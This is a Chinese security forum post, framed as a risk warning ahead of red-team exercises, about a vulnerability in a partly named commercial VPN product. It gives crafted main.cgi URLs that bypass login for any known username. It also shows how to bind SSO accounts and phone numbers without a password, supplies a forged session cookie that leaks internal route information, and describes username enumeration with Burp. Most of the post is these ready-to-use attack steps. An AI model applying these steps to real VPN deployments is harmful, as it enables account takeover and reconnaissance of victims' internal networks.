查看: 15640|回复: 0

【风险预警】某捷VPN越权绑定&信息泄露

[复制链接]
  • TA的每日心情
    擦汗
    2021-7-16 19:12
  • 签到天数: 30 天

    [LV.5]常住居民I

    发表于 2021-2-26 22:13:40 | 显示全部楼层 |阅读模式
    0x01 简述
    HVV临近,现预警一个某捷VPN的信息泄露及越权绑定SSO账号及手机号的问题
    注:需要知道存在的VPN用户,当然如果不知道的话,可以使用文章后面的那个方法进行用户名爆破
    话不多说先上图
    1.png


    0x02 越权绑定
    首先打开VPN登录页,可以看到是这样子的
    2.png

    直接构造URL:
    https://1.1.1.1/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=USERNAME&sid=1614345312&oper=showres
    USERNAME为已存在的用户名,访问后即可进入到这样一个界面
    3.png

    然后我们点击左侧的“个人设置”
    4.png

    在如上图功能这里,没有任何密码验证,可以直接给这个用户绑定SSO账号及手机号
    5.png

    0x03 信息泄露
    直接构造URL:
    https://1.1.1.1/cgi-bin/main.cgi?oper=getrsc
    注:需要先使用第一步的方式构造URL进入到设置页面,否则没有Cookie,会提示“错误:当前用户不在线,请重新登录”,当然你也可以手动构造Cookie
    Cookie: UserName=USERNAME; SessionId=1614345312; FirstVist=1; Skin=1; tunnel=1

    然后再打开的页面,就可以看到他VPN现有的路由信息
    6.png

    同时,通过Burp抓包可以发现,如果用户名是正确的,这个页面才会返回路由信息
    7.png

    如果用户是不存在的,就不会返回
    8.png

    通过这个方法,可以使用Burp进行用户名爆破

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 11:22 , Processed in 0.037771 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部